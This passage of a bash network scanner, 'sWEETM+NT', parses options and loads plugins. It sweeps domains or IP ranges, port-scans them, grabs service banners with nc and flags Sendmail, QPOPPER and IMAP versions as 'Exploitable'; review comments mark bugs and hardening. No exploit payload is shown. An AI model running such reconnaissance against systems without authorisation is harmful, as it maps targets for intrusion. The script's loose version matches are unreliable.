        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='on'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='on'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='on'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='on'
        fi

elif ( echo "$firstPARAM" | grep "disable" > /dev/null ) && [ -z $secondPARAM ]
    then
        resolve_host='on'
        alive_host='on'
        remote_fs='on'
        cgi_scan='on'
        wingate_scan='on'
        netbios_scan='on'
        rpc_info='on'
        bind_ver='on'
        bind_exploit='on'
        get_finger='on'
        nis_map='on'
        banner_dump='on'
        rusers_scan='on'
        bcast_scan='on'
        use_plugins='on'
        imap_bug='on'
        smtppop3_bugs='on'

        tempVERIFY=`echo "$firstPARAM" | $cutPATH --characters=10-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='off'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='off'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='off'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='off'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='off'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='off'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='off'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='off'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='off'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='off'
        fi

else
    echo "* ERROR: unrecognized parameter on command line."
    echo " "
    echo "Only [-tar] [-full] [-enable:<opts>] [-disable:<opts>] are accepted."
    echo " "
    rm sweetmint.LOCK
    exit 1

fi

# Switch off every feature whose helper program could not be located.
# A path variable containing the text "not found" is treated as "tool
# missing"; HEAD shows such variables being filled from `which` output
# when the config file is first created.
case "$nslookupPATH" in
  *"not found"*) resolve_host='off' ;;
esac

case "$showmountPATH" in
  *"not found"*) remote_fs='off' ;;
esac

case "$fingerPATH" in
  *"not found"*) get_finger='off' ;;
esac

case "$lynxPATH" in
  *"not found"*) cgi_scan='off' ;;
esac

# Archiving the results is dropped when either tar or gzip is missing.
case "$tarPATH" in
  *"not found"*) tar_results='off' ;;
esac

case "$gzipPATH" in
  *"not found"*) tar_results='off' ;;
esac

# Without ping neither the alive-host check nor the broadcast scan stays on.
case "$pingPATH" in
  *"not found"*)
    alive_host='off'
    bcast_scan='off'
    ;;
esac

case "$rusersPATH" in
  *"not found"*) rusers_scan='off' ;;
esac

# Option dependencies: some checks only work when another option is on,
# so that option is forced on and the operator is told which letter caused it.

# The SMTP/POP3 ('S') and IMAP ('i') checks need the banner dump.  Only the
# first matching reason is reported because banner_dump is 'on' afterwards.
if [ "$banner_dump" = off ]; then
  if [ "$smtppop3_bugs" = on ]; then
    banner_dump='on'
    echo "* Auto enable Banner dump of ports due to parameter 'S' enabled"
  elif [ "$imap_bug" = on ]; then
    banner_dump='on'
    echo "* Auto enable Banner dump of ports due to parameter 'i' enabled"
  fi
fi

# Remote filesystem listing ('f') and rusers ('R') force RPC collection on.
# A message is printed only when the other switch is explicitly on or off.
if [ "$rpc_info" = off ]; then
  if [ "$remote_fs" = on ]; then
    rpc_info='on'
    if [ "$rusers_scan" = on ]; then
      echo "* Auto enable Collect RPC informations due to parameter 'f' and 'R' enabled"
    elif [ "$rusers_scan" = off ]; then
      echo "* Auto enable Collect RPC informations due to parameter 'f' enabled"
    fi
  elif [ "$rusers_scan" = on ]; then
    rpc_info='on'
    if [ "$remote_fs" = off ]; then
      echo "* Auto enable Collect RPC informations due to parameter 'R' enabled"
    fi
  fi
fi


# Last automatic adjustments before the option summary is printed.

# NOTE(review): this guard fires when resolve_host is already something other
# than 'on', yet the message announces that resolving is being disabled
# because of the file list - confirm whether the test was meant to be
# "resolve_host = on".
if [ "$isONfilelist" = on ] && [ "$resolve_host" != on ]; then
  resolve_host='off'
  echo "* Auto disable resolve hostnames due to scan from filelist"
fi

# For an IP range scan with resolving not on, the alive-host ping is forced on.
# NOTE(review): the guard reads resolve_host, not alive_host - confirm intent.
if [ "$isONrange" = on ] && [ "$resolve_host" != on ]; then
  alive_host='on'
  echo "* Auto enable ping for alive hosts due to scan of IPs range"
fi

# Plugins cannot be loaded without their configuration file.
if [ ! -e plugins.conf ]; then
  use_plugins='off'
  echo "* Auto disable plugin processing due to missing plugins.conf file"
fi

# Print the effective on/off state of every option for this run.
cat <<EOF
  - Resolve hostnames            : $resolve_host
  - Find alive hosts             : $alive_host
  - Remote mountable directories : $remote_fs
  - Check for CGI exploits       : $cgi_scan
  - Wingate scanning             : $wingate_scan
  - Netbios shared resources scan: $netbios_scan
  - Collect RPC informations     : $rpc_info
  - Collect BIND version         : $bind_ver
  - Check for BIND exploits      : $bind_exploit
  - Collect FINGER informations  : $get_finger
  - Collect NIS maps listing     : $nis_map
  - Dump greet banners           : $banner_dump
  - RUSERS info collection       : $rusers_scan
  - Linux IMAP bug check         : $imap_bug
  - SMTP and POP3 bugs check     : $smtppop3_bugs
  - Broadcast scanning           : $bcast_scan
  - Use external plugins         : $use_plugins
  - .TAR.GZipping of results     : $tar_results
EOF

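# Rewrite .smintrc: one line per helper-program path, in a fixed order,
# followed by the "params ..." line.
#
# The file stores the paths of programs this script executes ($cutPATH,
# $pingPATH, $nslookupPATH, ...), and HEAD shows the script can run as root.
# It is therefore written without group/other write permission, so another
# local account cannot change which programs a later run starts.
# NOTE(review): presumably the file is read back by line position - verify
# against the config parser before changing the order or the line count.
rm -f -- .smintrc
{
  for smintrcENTRY in \
    "$uniqPATH" "$nslookupPATH" "$sortPATH" "$cutPATH" "$showmountPATH" \
    "$nohupPATH" "$fingerPATH" "$lynxPATH" "$tarPATH" "$gzipPATH" \
    "$pingPATH" "$rusersPATH" "$traceroutePATH"
  do
    # Quoted so the value is neither glob-expanded nor re-split; embedded
    # newlines are flattened to keep exactly one line per entry.
    printf '%s\n' "${smintrcENTRY//$'\n'/ }"
  done
  printf '%s\n' "params $defaultPARAMETERS"
} > .smintrc

chmod u=rw,go=r .smintrc

echo " "
echo "* Parameters saved in .smintrc for later use."
echo " "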

# PLUGINS INITIALIZATION ------------------------------------------------

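# Plugin initialization.  plugins.conf is read for:
#   - a line containing "plugins_directory=" (value taken from column 19 on),
#   - one "startplugin--<name>" token per plugin,
#   - every line mentioning <name>, copied to $tmpdir/<name>.plugin and then
#     queried for the "_status", "_type", "_id" and "_disable" keys.
# Enabled plugins are queued in $tmpdir/plugins.{single,list,post}run, and the
# letters in "_disable" switch internal checks off.
# plugins.conf decides which files the scan loop later sources (in a
# subshell), so it should be writable by the operator only.
if [ "$use_plugins" = on ]; then
  echo "* Loading user plugins..."

  # Every path below is built from $tmpdir; with an empty value the cleanup
  # glob would expand to /*.plugin, so stop before touching anything.
  if [ -z "$tmpdir" ]; then
    echo "* ERROR: temporary directory is not set"
    rm -f -- sweetmint.LOCK
    exit 1
  fi

  # plugins.active marks left-overs of an earlier session.
  if [ -e "$tmpdir/plugins.active" ]; then
    rm -f -- "$tmpdir"/*.plugin
    rm -f -- "$tmpdir/plugins.singlerun" "$tmpdir/plugins.listrun" \
      "$tmpdir/plugins.postrun" "$tmpdir/plugins.active"
  fi

  plugTEMP=$(grep "plugins_directory=" plugins.conf)
  # Left unquoted: word splitting trims leading blanks, which the fixed
  # column offset below relies on.
  # shellcheck disable=SC2086
  pluginsDIR=$(echo $plugTEMP | cut --characters=19-)

  # Truncate instead of append: the error exit below leaves this file behind,
  # and appending would load the stale names again on the next run.
  grep "startplugin--" plugins.conf > "$tmpdir/pnames.temp"

  # Word splitting is wanted here: each plugin name is one blank-free token.
  # shellcheck disable=SC2013
  for defplugin in $(cat "$tmpdir/pnames.temp"); do

    touch "$tmpdir/plugins.active"

    plugTEMP=$(echo "$defplugin" | cut --characters=14-)

    # The name becomes part of a file name under $tmpdir; an empty name or
    # one with a path separator would read or write outside the intended file.
    case "$plugTEMP" in
      '' | */*)
        echo "* ERROR: Invalid plugin name ($plugTEMP)"
        rm -f -- sweetmint.LOCK
        exit 1
        ;;
    esac

    grep -- "$plugTEMP" plugins.conf >> "$tmpdir/$plugTEMP.plugin"

    plugSTATUS=$(grep "_status" "$tmpdir/$plugTEMP.plugin" | cut -d'=' --fields=2)
    plugTYPE=$(grep "_type" "$tmpdir/$plugTEMP.plugin" | cut -d'=' --fields=2)

    # Map the plugin type to its run list; anything else aborts the session.
    case "$plugTYPE" in
      single) plugRUNLIST="$tmpdir/plugins.singlerun" ;;
      list) plugRUNLIST="$tmpdir/plugins.listrun" ;;
      post) plugRUNLIST="$tmpdir/plugins.postrun" ;;
      *)
        echo "* ERROR: Unknown plugin type ($plugTYPE)"
        rm -f -- sweetmint.LOCK
        exit 1
        ;;
    esac

    if [ "$plugSTATUS" = enable ]; then
      echo "$plugTEMP" >> "$plugRUNLIST"

      plugIDT=$(grep "_id" "$tmpdir/$plugTEMP.plugin" | cut -d'=' --fields=2)

      echo "* Loaded: $plugIDT"

      plugDISABLE=$(grep "_disable" "$tmpdir/$plugTEMP.plugin" | cut -d'=' --fields=2)

      if [ -n "$plugDISABLE" ]; then
        echo "* Plugin disabled the following internal options:"

        # Each letter found anywhere in the value turns one option off.
        case "$plugDISABLE" in *f*)
          remote_fs='off'
          echo "  - Remote mountable directories : $remote_fs"
          ;;
        esac

        case "$plugDISABLE" in *c*)
          cgi_scan='off'
          echo "  - Check for CGI exploits       : $cgi_scan"
          ;;
        esac

        case "$plugDISABLE" in *w*)
          wingate_scan='off'
          echo "  - Wingate scanning             : $wingate_scan"
          ;;
        esac

        case "$plugDISABLE" in *s*)
          netbios_scan='off'
          echo "  - Netbios shared resources scan: $netbios_scan"
          ;;
        esac

        case "$plugDISABLE" in *r*)
          rpc_info='off'
          echo "  - Collect RPC informations     : $rpc_info"
          ;;
        esac

        case "$plugDISABLE" in *b*)
          bind_ver='off'
          echo "  - Collect BIND version         : $bind_ver"
          ;;
        esac

        case "$plugDISABLE" in *B*)
          bind_exploit='off'
          echo "  - Check for BIND exploits      : $bind_exploit"
          ;;
        esac

        case "$plugDISABLE" in *F*)
          get_finger='off'
          echo "  - Collect FINGER informations  : $get_finger"
          ;;
        esac

        case "$plugDISABLE" in *N*)
          nis_map='off'
          echo "  - Collect NIS maps listing     : $nis_map"
          ;;
        esac

        case "$plugDISABLE" in *d*)
          banner_dump='off'
          echo "  - Dump greet banners           : $banner_dump"
          ;;
        esac

        case "$plugDISABLE" in *R*)
          rusers_scan='off'
          echo "  - RUSERS info collection       : $rusers_scan"
          ;;
        esac

        case "$plugDISABLE" in *t*)
          bcast_scan='off'
          echo "  - Broadcast scanning           : $bcast_scan"
          ;;
        esac

        # 'T' is honoured only for post plugins, and only while archiving is on.
        case "$plugDISABLE" in *T*)
          if [ "$plugTYPE" = post ] && [ "$tar_results" = on ]; then
            tar_results='off'
            echo "  - .TAR.GZipping of results     : $tar_results"
          fi
          ;;
        esac

        case "$plugDISABLE" in *i*)
          imap_bug='off'
          echo "  - Linux IMAP bug check         : $imap_bug"
          ;;
        esac

        case "$plugDISABLE" in *S*)
          smtppop3_bugs='off'
          echo "  - SMTP and POP3 bugs check     : $smtppop3_bugs"
          ;;
        esac
      fi
    fi

  done

  rm -f -- "$tmpdir/pnames.temp"

  echo " "
fi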

# ---------------------------------------------------------------------

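echo -n "* Updating history file... "

# Record what this run targets in .smhistory, one line per run.  The target
# kind is recognised by a marker inside $scanDOMAIN ("resume:", "single:",
# "file:", "range:"); anything else is treated as a domain name.
# The value after the first ':' is cut straight from the variable.  Passing
# it through an appended-to file under $tmpdir would pick up stale or
# pre-created content and corrupt the parsed target.
case "$scanDOMAIN" in
  *resume:*)
    scanRESUME=$(printf '%s\n' "$scanDOMAIN" | cut -d':' -f 2)
    historyENTRY="$timeINFO: resumed scan [$scanRESUME]"
    ;;
  *single:*)
    scanSINGLE=$(printf '%s\n' "$scanDOMAIN" | cut -d':' -f 2)
    historyENTRY="$timeINFO: single host [$scanSINGLE]"
    singleisON='on'
    ;;
  *file:*)
    scanFILE=$(printf '%s\n' "$scanDOMAIN" | cut -d':' -f 2)
    historyENTRY="$timeINFO: scan from file [$scanFILE]"
    ;;
  *range:*)
    historyENTRY="$timeINFO: IPs in range [$rangeONEstart.$rangeTWOstart.$rangeTHREEstart.$rangeFOURstart -> $rangeONEend.$rangeTWOend.$rangeTHREEend.$rangeFOURend]"
    ;;
  *)
    historyENTRY="$timeINFO: domain [$scanDOMAIN]"
    ;;
esac

# The entry is terminated by a blank and a newline, as before.
printf '%s \n' "$historyENTRY" >> .smhistory
echo "done."

# Setup is complete; release the session lock so another run may initialise.
rm -f -- sweetmint.LOCK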

# ------------------------------------------------------------------------
# START SHAKING AND ROLLING A LOTTA!
# ------------------------------------------------------------------------

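echo " "
echo "* --- Start shaking and rolling a lotta! ---"
echo " "

# Append the standard five-line header to a results file.
# Arguments: $1 - results file, $2 - the "Scan log for ..." line
# The file name is quoted: it is derived from the command-line target, and an
# unquoted name containing blanks or glob characters would send the header to
# a different file than intended.
sm_results_header() {
  {
    printf '%s\n' "sWEETM+NT v$sweetVER - sWEET mAGIC + iNTERFACE"
    printf '%s\n' "$2"
    printf '%s\n' "Created on $timeINFO by user $userID"
    printf '%s\n' "Parameters for this run were: $defaultPARAMETERS"
    printf '%s\n' " "
  } >> "$1"
}

# Plain domain run: none of the target markers is present.
case "$scanDOMAIN" in
  *resume:* | *single:* | *file:* | *range:*) ;;
  *)
    sm_results_header "$scanDOMAIN.results" "Scan log for domain $scanDOMAIN"
    ;;
esac

# The marker tests below are independent of each other.
case "$scanDOMAIN" in
  *single:*)
    sm_results_header "$scanSINGLE.results" "Scan log for single host $scanSINGLE"
    ;;
esac

case "$scanDOMAIN" in
  *file:*)
    sm_results_header "$scanFILE.results" "Scan log for hosts in file $scanFILE"
    ;;
esac

case "$scanDOMAIN" in
  *range:*)
    sm_results_header "$scanRANGE.results" "Scan log for IPs in range $rangeONEstart.$rangeTWOstart.$rangeTHREEstart.$rangeFOURstart -> $rangeONEend.$rangeTWOend.$rangeTHREEend.$rangeFOURend"
    ;;
esac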

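# Build the host lists for a fresh (non-resumed) run:
#   <target>.ip        every candidate address
#   <target>.ip.alive  entries kept by the ping check       (alive_host = on)
#   <target>.hosts     "Name" lines of the nslookup output  (resolve_host = on)
# Each list is also appended to <target>.results.
# All expansions are quoted so a target or tool path containing blanks cannot
# split into extra arguments.  In particular an empty $pingPATH no longer
# turns the host name itself into the command being run.
if ! printf '%s\n' "$scanDOMAIN" | grep "resume:" > /dev/null; then

  # -- ip generation stuff --

  case "$scanDOMAIN" in
    *single:*)
      scanSINGLE=$(printf '%s\n' "$scanDOMAIN" | cut -d':' -f 2)
      scanDOMAIN=$scanSINGLE

      printf '%s\n' "$scanDOMAIN" " " > "$scanDOMAIN.ip"
      ;;

    *file:*)
      scanFILE=$(printf '%s\n' "$scanDOMAIN" | cut -d':' -f 2)
      scanDOMAIN=$scanFILE
      cp -- "$scanFILE" "$scanFILE.ip"
      ;;

    *range:*)
      scanRANGEtmp=$(printf '%s\n' "$scanDOMAIN" | cut -d':' -f 2)
      scanDOMAIN=$scanRANGE

      loopONE=$rangeONEstart
      loopTWO=$rangeTWOstart
      loopTHREE=$rangeTHREEstart
      loopFOUR=$rangeFOURstart

      echo "* Calculating IPs in range [$rangeONEstart.$rangeTWOstart.$rangeTHREEstart.$rangeFOURstart -> $rangeONEend.$rangeTWOend.$rangeTHREEend.$rangeFOURend] (may take a while)"

      # Every combination of the four octets is written, each octet running
      # over its own start..end interval.  The list is truncated first so
      # entries from an earlier run are not mixed in.
      while [ "$loopONE" -le "$rangeONEend" ]; do
        while [ "$loopTWO" -le "$rangeTWOend" ]; do
          while [ "$loopTHREE" -le "$rangeTHREEend" ]; do
            while [ "$loopFOUR" -le "$rangeFOURend" ]; do
              echo "$loopONE.$loopTWO.$loopTHREE.$loopFOUR"
              loopFOUR=$((loopFOUR + 1))
            done
            loopFOUR=$rangeFOURstart
            loopTHREE=$((loopTHREE + 1))
          done
          loopTHREE=$rangeTHREEstart
          loopTWO=$((loopTWO + 1))
        done
        loopTWO=$rangeTWOstart
        loopONE=$((loopONE + 1))
      done > "$scanDOMAIN.ip"

      echo " " >> "$scanDOMAIN.ip"
      ;;

    *)
      echo "* Generating IP list of machines for [$scanDOMAIN]"
      "$extrabinPATH/z0ne" -o "$scanDOMAIN" > "$scanDOMAIN.ip"
      echo " " >> "$scanDOMAIN.ip"
      ;;
  esac

  echo "IP's of machines in the domain:" >> "$scanDOMAIN.results"
  cat -- "$scanDOMAIN.ip" >> "$scanDOMAIN.results"
  echo " " >> "$scanDOMAIN.results"

  if [ "$alive_host" = on ]; then
    echo "* Verifying alive hosts in $scanDOMAIN.ip (it takes a while)"

    # Start from an empty list; appending to an existing file would carry
    # over hosts recorded by an earlier run.
    : > "$scanDOMAIN.ip.alive"

    # Word splitting is relied on to skip the blank line that ends the list.
    # shellcheck disable=SC2013
    for alivehosts in $(cat -- "$scanDOMAIN.ip"); do
      # ping output is inspected in a pipe instead of a shared, fixed-name
      # file under $tmpdir.
      if ! "$pingPATH" "$alivehosts" -c 2 |
        grep "0 packets received, 100% packet loss" > /dev/null; then
        echo "$alivehosts" >> "$scanDOMAIN.ip.alive"
      fi
    done

    echo "ip's of ALIVE machines in the domain:" >> "$scanDOMAIN.results"
    cat -- "$scanDOMAIN.ip.alive" >> "$scanDOMAIN.results"
    echo " " >> "$scanDOMAIN.results"
  fi

  if [ "$resolve_host" = on ]; then
    if [ "$alive_host" = on ]; then
      resolveUSElist=$scanDOMAIN.ip.alive
    else
      resolveUSElist=$scanDOMAIN.ip
    fi

    echo "* Resolving ip's to hostnames in $resolveUSElist (it takes a while)"

    # Same filter chain as before (Name lines, text from column 10 on), but
    # without intermediate files whose names embed the scan target.
    "$nslookupPATH" < "$resolveUSElist" |
      grep Name |
      "$cutPATH" --characters=10- > "$scanDOMAIN.hosts"

    echo "hostnames of machines in the domain:" >> "$scanDOMAIN.results"
    cat -- "$scanDOMAIN.hosts" >> "$scanDOMAIN.results"
    echo " " >> "$scanDOMAIN.results"
  fi

fi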

# Choose the list the main loop walks (mainLIST) and its IP-only companion
# (mainLISTip) from the alive/resolve switches.  Nothing is assigned unless
# both switches are exactly 'on' or 'off'.
if [ "$alive_host" = on ]; then
  if [ "$resolve_host" = on ]; then
    mainLIST=$scanDOMAIN.hosts
    mainLISTip=$scanDOMAIN.ip.alive
  elif [ "$resolve_host" = off ]; then
    mainLIST=$scanDOMAIN.ip.alive
    mainLISTip=$scanDOMAIN.ip.alive
  fi
elif [ "$alive_host" = off ]; then
  if [ "$resolve_host" = on ]; then
    mainLIST=$scanDOMAIN.hosts
    mainLISTip=$scanDOMAIN.ip
  elif [ "$resolve_host" = off ]; then
    mainLIST=$scanDOMAIN.ip
    mainLISTip=$scanDOMAIN.ip
  fi
fi

# Copy of the list name taken before the resume handling may replace mainLIST.
mainLISTwgatez=$mainLIST

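# Resume handling.  For "resume:<target>" the work list is <target>.resume
# minus every entry already recorded in <target>.done; otherwise the current
# list is saved as <target>.resume so that an aborted run can be resumed.
case "$scanDOMAIN" in
  *resume:*)
    scanRESUME=$(printf '%s\n' "$scanDOMAIN" | cut -d':' -f 2)
    scanDOMAIN=$scanRESUME

    rm -f -- "$scanDOMAIN.resumelist"

    cp -- "$scanDOMAIN.resume" "$tmpdir/resumelist.temp"

    # Word splitting is wanted: each finished host is one blank-free token.
    # shellcheck disable=SC2013
    for siteresume in $(cat -- "$scanDOMAIN.done"); do
      # Filter into a second file and swap it in.  Redirecting grep's output
      # onto the file it is reading truncates that file before it is read,
      # which would empty the resume list.
      # -F matches the host text literally (dots are not wildcards).
      # NOTE(review): this is still a substring match, so a finished host
      # also removes any entry that merely contains its text - confirm the
      # .done format before tightening it to whole-line matching.
      grep -v -F -- "$siteresume" "$tmpdir/resumelist.temp" \
        > "$tmpdir/resumelist.temp.new"
      mv -f -- "$tmpdir/resumelist.temp.new" "$tmpdir/resumelist.temp"
    done

    cp -- "$tmpdir/resumelist.temp" "$scanDOMAIN.resumelist"
    rm -f -- "$tmpdir/resumelist.temp"

    mainLIST=$scanDOMAIN.resumelist

    echo "[$timeINFO: Resuming previously aborted scan...]" >> "$scanDOMAIN.results"
    echo " " >> "$scanDOMAIN.results"
    ;;

  *)
    echo "[Scan results for machines in $mainLIST]" >> "$scanDOMAIN.results"
    echo " " >> "$scanDOMAIN.results"

    cp -- "$mainLIST" "$scanDOMAIN.resume"
    ;;
esac

echo "* Starting main scan loop - using list $mainLIST"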

for siteprocess in `cat $mainLIST`
   do

     echo "* Processing host: $siteprocess"
     
     echo "Machine $siteprocess:" >> $scanDOMAIN.results
     echo " " >> $scanDOMAIN.results

     $extrabinPATH/strobe -q -o $tmpdir/portscan.temp -b 1 -e 1080 -t 10 $siteprocess > $tmpdir/portscan.temp

     echo "Open ports from 1 to 1080:" >> $scanDOMAIN.results
     cat $tmpdir/portscan.temp | grep -v "Open ports" >> $scanDOMAIN.results
     echo " " >> $scanDOMAIN.results 

#-------------- single plugins part

if [ "$use_plugins" = on ] && [ -e $tmpdir/plugins.singlerun ]
  then
      for execplugin in `cat $tmpdir/plugins.singlerun`
         do
           plugFILE=`cat $tmpdir/$execplugin.plugin | grep "_file" | cut -d'=' --fields=2`
           plugPARAMS=`cat $tmpdir/$execplugin.plugin | grep "_params" | cut -d'=' --fields=2`
           plugLEVEL=`cat $tmpdir/$execplugin.plugin | grep "_level" | cut -d'=' --fields=2`

           if [ "$plugLEVEL" = $userTYPE ]
             then
                 echo "$plugPARAMS" >> $tmpdir/plugparams.temp 

                 echo -n "$pluginsDIR" >> $tmpdir/plugin.tempcommandline
                 echo -n "/" >> $tmpdir/plugin.tempcommandline
                 echo -n "$plugFILE" >> $tmpdir/plugin.tempcommandline
                 echo -n " " >> $tmpdir/plugin.tempcommandline

                 for pluginparameter in `cat $tmpdir/plugparams.temp`
                    do
                      if [ "$pluginparameter" = completeLIST ]
                        then
                            echo -n "$mainLIST" >> $tmpdir/plugin.tempcommandline
               
                      elif [ "$pluginparameter" = currentHOST ]
                          then
                              echo -n "$siteprocess" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = resultsFILE ]
                          then
                              echo -n "$scanDOMAIN.results" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = pluginsDIRECTORY ]
                          then
                              echo -n "$pluginsDIR" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = temporaryDIR ]
                          then
                              echo -n "$tmpdir" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = completeIPLIST ]
                          then
                              echo -n "$mainLISTip" >> $tmpdir/plugin.tempcommandline 
 
                      else
                          echo -n "$pluginparameter" >> $tmpdir/plugin.tempcommandline

                      fi
 
                      echo -n " " >> $tmpdir/plugin.tempcommandline

                    done

                 pluginEXEC=`cat $tmpdir/plugin.tempcommandline`

                 ( . $pluginEXEC )

                 rm $tmpdir/plugparams.temp
                 rm $tmpdir/plugin.tempcommandline
        
           fi

         done

fi

#----------------------------------------------------------

#--------------BANNER DUMPING
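     # Banner dumping (only when $banner_dump is on).  For every service port
     # that $tmpdir/portscan.temp lists as open, connect once with nc, keep
     # whatever the service prints and append it to $scanDOMAIN.results; the
     # per-service temp file is removed right after it has been copied.
     #
     # The literal line "sWEETM+NT" is the only input sent to each service, so
     # these connections can be matched on that string in a packet capture.
     #
     # NOTE(review): banner text is chosen by the remote host and is copied
     # verbatim into the results file; whatever reads that file later has to
     # treat it as untrusted data.
     # NOTE(review): the version checks are unanchored regular expressions in
     # which '.' matches any character (a timestamp such as "14:15" satisfies
     # "4.1"), so an "Exploitable ..." line is a hint to confirm by hand.
     #
     # All path and host expansions are quoted so a value containing blanks or
     # glob characters cannot split into extra arguments.
     if [ "$banner_dump" = on ]
       then

           # FTP
           if grep "21/tcp" "$tmpdir/portscan.temp" > /dev/null
             then
                 echo "sWEETM+NT" | $extrabinPATH/nc -v -w 10 -t "$siteprocess" 21 > "$tmpdir/$siteprocess.ftpbanner" 2>/dev/null
                 echo "Banner on standard FTP port (21)" >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"
                 cat "$tmpdir/$siteprocess.ftpbanner" >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"
                 rm "$tmpdir/$siteprocess.ftpbanner"
           fi

           # TELNET
           if grep "23/tcp" "$tmpdir/portscan.temp" > /dev/null
             then
                 echo "sWEETM+NT" | $extrabinPATH/nc -v -w 10 -t "$siteprocess" 23 > "$tmpdir/$siteprocess.telnetbanner" 2>/dev/null
                 echo "Banner on standard TELNET port (23)" >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"

                 # "inux" matches both "Linux" and "linux"; the result is read
                 # again in the IMAP section of this block.
                 # NOTE(review): nothing in this block resets remoteOStype when
                 # 23/tcp is closed, so it may carry a value set earlier.
                 if grep "inux" "$tmpdir/$siteprocess.telnetbanner" > /dev/null
                   then
                       remoteOStype='linux'
                   else
                       remoteOStype='notlinux'
                 fi

                 cat "$tmpdir/$siteprocess.telnetbanner" >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"
                 rm "$tmpdir/$siteprocess.telnetbanner"
           fi

           # SMTP
           if grep "25/tcp" "$tmpdir/portscan.temp" > /dev/null
             then
                 echo "sWEETM+NT" | $extrabinPATH/nc -v -w 10 -t "$siteprocess" 25 > "$tmpdir/$siteprocess.smtpbanner" 2>/dev/null
                 echo "Banner on standard SMTP port (25)" >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"
                 cat "$tmpdir/$siteprocess.smtpbanner" >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"

                 # Product name first, then the version substrings.
                 if [ "$smtppop3_bugs" = on ] \
                    && grep -e "endmail" -e "endMail" "$tmpdir/$siteprocess.smtpbanner" > /dev/null \
                    && grep -e "4.1" -e "5.55" -e "5.59" -e "5.64" -e "5.65" "$tmpdir/$siteprocess.smtpbanner" > /dev/null
                   then
                       echo "Exploitable Sendmain present on system" >> "$scanDOMAIN.results"
                       echo " " >> "$scanDOMAIN.results"
                 fi

                 rm "$tmpdir/$siteprocess.smtpbanner"
           fi

           # POP3
           if grep "110/tcp" "$tmpdir/portscan.temp" > /dev/null
             then
                 echo "sWEETM+NT" | $extrabinPATH/nc -v -w 10 -t "$siteprocess" 110 > "$tmpdir/$siteprocess.pop3banner" 2>/dev/null
                 echo "Banner on standard POP3 port (110)" >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"
                 cat "$tmpdir/$siteprocess.pop3banner" >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"

                 if [ "$smtppop3_bugs" = on ] \
                    && grep "QPOP" "$tmpdir/$siteprocess.pop3banner" > /dev/null \
                    && grep -e "2.2" -e "2.4" -e "2.3" -e "2.1.4" "$tmpdir/$siteprocess.pop3banner" > /dev/null
                   then
                       echo "Exploitable QPOPPER present on system" >> "$scanDOMAIN.results"
                       echo " " >> "$scanDOMAIN.results"
                 fi

                 rm "$tmpdir/$siteprocess.pop3banner"
           fi

           # IMAP
           if grep "143/tcp" "$tmpdir/portscan.temp" > /dev/null
             then
                 echo "sWEETM+NT" | $extrabinPATH/nc -v -w 10 -t "$siteprocess" 143 > "$tmpdir/$siteprocess.imap4banner" 2>/dev/null
                 echo "Banner on standard IMAP2 port (143)" >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"
                 cat "$tmpdir/$siteprocess.imap4banner" >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"

                 if [ "$imap_bug" = on ]
                   then
                       # The "(Linux) " tag is written without a newline and
                       # is emitted whether or not the version check matches.
                       if [ "$remoteOStype" = linux ]
                         then
                             echo -n "(Linux) " >> "$scanDOMAIN.results"
                       fi

                       # The 10.x patterns end in a blank on purpose.
                       if grep -e "9.0" -e "10.166 " -e "10.171 " -e "10.173 " \
                               -e "10.190 " -e "10.203 " -e "10.205 " -e "10.223 " \
                               "$tmpdir/$siteprocess.imap4banner" > /dev/null
                         then
                             echo " " >> "$scanDOMAIN.results"
                             echo "Exploitable IMAP4 found on system" >> "$scanDOMAIN.results"
                             echo " " >> "$scanDOMAIN.results"
                       fi
                 fi

                 rm "$tmpdir/$siteprocess.imap4banner"
           fi

     fi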
#---------------------------------------------------

#--------------FINGER
